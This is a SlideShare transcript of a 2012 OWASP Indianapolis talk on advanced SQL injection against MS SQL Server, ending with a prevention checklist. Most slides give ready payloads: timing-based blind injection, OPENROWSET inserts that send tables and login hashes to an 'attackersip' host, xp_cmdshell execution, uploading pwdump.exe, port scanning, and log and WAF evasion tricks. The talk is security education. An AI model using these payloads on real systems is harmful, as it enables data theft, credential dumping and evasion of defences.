Owasp Indy Q2 2012 Advanced SQLi
Upcoming SlideShare
Loading in...5
×
 

Owasp Indy Q2 2012 Advanced SQLi

on

  • 2,488 views

 

Statistics

Views

Total Views
2,488
Slideshare-icon Views on SlideShare
2,487
Embed Views
1

Actions

Likes
1
Downloads
57
Comments
0

1 Embed 1

https://si0.twimg.com 1

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Owasp Indy Q2 2012 Advanced SQLi Owasp Indy Q2 2012 Advanced SQLi Presentation Transcript

    • Advanced SQLi and Evasion Techniques
    • About MeIntroductionDamian Profancik | Technical Lead/Security Services Leader @ Apparatus, CISSP dprofancik@gmail.com @integrisec
    • CreditCesar Cerrudo – CTO, IOActive Labs o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injecti on.pdfModSecurity Team – Trustwave SpiderLabs o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons- learned.htmlAvi Douglen – OWASP Board Member, Israel o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
    • SQL Injection Basics• Dynamic construction of SQL queries “SELECT * FROM table WHERE user = “ + uname + “ AND pwd = ” + pword + “”• Unsanitized user input uname = or 1=1-- => SELECT * FROM table WHERE user = or 1=1-- AND pwd =• Excessive permission o Web services running as privileged user with db_owner rights o Connecting to database using sa, dbo, or sysadmin accounts o Lax file system permissions
    • Advance SQLi Techniques• Blind SQL Injection• Data Exfiltration• Privilege Escalation• Command Execution• Uploading Files• Internal DB Server Exploration• Port Scanning• Firewall Evasion• Log Evasion• WAF Evasion
    • Blind SQL Injection
    • Blind SQL Injection• Differential Analysis Example: http://www.someforum.com/posts.php?id=2 SELECT author, title, body FROM posts WHERE ID = 2 http://www.someforum.com/posts.php?id=2 and 1=2 SELECT author, title, body FROM posts WHERE ID = 2 and 1=2 http://www.someforum.com/posts.php?id=2 and 1=1 SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
    • Blind SQL Injection (cont.)• Database Management System Fingerprinting o System Functions • MS SQL Server = getdate() • MySQL = now() • Oracle = sysdate() • Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate() o String Concatenation • MS SQL Server = + • MySQL = +, CONCAT() • Oracle = ||, CONCAT() • Example: http://www.someforum.com/posts.php?id=2 and test=te+st o Query Chaining • MS SQL Server, MySQL = allows chaining with semicolon • Oracle = does NOT allow chaining with semicolon • Example: http://www.someforum.com/posts.php?id=2; commit --
    • Blind SQL Injection (cont.)• Timing Attacks o Adding delay • SQL Server = WAIT FOR DELAY 0:0:10‘ • MySQL = BENCHMARK(10000000,ENCODE(MSG,by 10 seconds)),null) • PostgreSQL = pg_sleep(10) • Oracle = Union with query that contains a lot of results o SELECT IF(condition, true, false) Example: …1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE(MSG,by 10 seconds)),null) FROM users WHERE userid = 1;
    • Attacking MS SQL Server
    • Linked and Remote Servers• OPENROWSET Example: SELECT * FROM OPENROWSET( SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433; SELECT * FROM table )• OPENDATASOURCE Example: SELECT * FROM OPENDATASOURCE( SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433; ) .DatabaseName.dbo.TableName
    • Data Exfiltration• Remote server INSERT Example: INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM table1) SELECT * FROM table2
    • Data Exfiltration (cont.) INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM _sysdatabases) SELECT * FROM master.dbo.sysdatabases INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM _sysobjects ) SELECT * FROM databasename.dbo.sysobjects INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM _syscolumns) SELECT * FROM databasename.dbo.syscolumns
    • Data Exfiltration (cont.) INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM table1) SELECT * FROM databasename..table1 INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM table2) SELECT * FROM databasename..table2 INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, ‘SELECT * FROM _sysxlogins) SELECT * FROM databasename.dbo.sysxlogins
    • Privilege Escalation• Known vulnerabilities Example: SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt• Often not required o Connection strings using SA, dbo, sysadmin o Web service context
    • Command Execution Example: INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM temp_table) EXEC master.dbo.xp_cmdshell dir
    • Uploading FilesOn attacker’s server…1. CREATE TABLE AttackerTable (data text)2. BULK INSERT AttackerTable FROM pwdump.exe WITH (codepage=RAW)On victim’s server…3. EXEC xp_cmdshell bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d4. EXEC xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftMSSQLServerClientConnectTo,AttackersAlias,REG_SZ ,DBMSSOCN,AttackersIP,805. EXEC xp_cmdshell bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias - Usa -Ppwn3d
    • Uploading Files (cont.) INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM temp_table) EXEC xp_cmdshell "first script line" >> script.vbs … EXEC xp_cmdshell "second script line" >> script.vbs ... EXEC xp_cmdshell "last script line" >> script.vbs EXEC xp_cmdshell script.vbs ==> execute script to download binary
    • Internal DB Server Exploration• Linked and Remote Servers1. INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM _sysservers) SELECT * FROM master.dbo.sysservers2. INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM _sysservers) SELECT * FROM linkedserver1.master.dbo.sysservers3. INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;, SELECT * FROM _sysdatabases) SELECT * FROM linkedserver1.master.dbo.sysdatabases4. Rinse and repeat…
    • Port Scanning Example: SELECT * FROM OPENROWSET(SQLOLEDB, uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5, SELECT * FROM table)
    • Evasion Techniques
    • Firewall Evasion• Use port 80 for outbound Example: INSERT INTO OPENROWSET(SQLOLEDB, uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;, SELECT * FROM table1) SELECT * FROM table2
    • Log Evasion• Inject using POST parameters• Long HTTP requests o IIS truncates requests longer than 4097 characters o Sun-One Application Server truncates at 4092 characters Example: http://www.someforum.com/posts.php?param=<4097 x ‘a’>&id=2 or 1=1--
    • WAF Evasion• Comments o # = single line comment o -- = single line comment o /* */ = inline, multi-line comment o /*! */ = MySQL-specific inline, multi-line comment Example: http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…• New line o %0D%0A = URL-encoded newline o %0B = URL-encoded vertical separator Example: http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
    • WAF Evasion (cont.)• Character Encoding o Unicode (U+02BC = ʼ) o CHAR() o Hexadecimal o URL-encoding o Double Encoding Example: Double Encoding: URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM… WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%252a%2fECT * FROM… Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
    • WAF Evasion (cont.)• Concatenation o EXEC() o Split/Join o Special Characters (i.e. ‘*‘, ‘+’, ‘%’, etc.) Example: Split/Join: URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users WAF = id=SELECT name id=password FROM users ASP/ASP.Net = id=SELECT name,password FROM users Special Characters: URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users WAF = id=SEL%ECT name,password FR%OM users ASP/ASP.Net = id=SELECT name,password FROM users
    • SQL Injection Prevention
    • SQLi Prevention• Sanitize User Input o Normalize Input o Whitelists o Built-in Functions o Regular Expressions o Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.)• Prepared Statements/Parameterized Queries• Stored Procedures• Accounts with Least Privilege• Enable DisallowAdhocAccess registry setting for MS SQL Server• Perform Self Assessments• Use a Web Application Firewall• Filter Outbound Traffic at Firewall
    • Q&A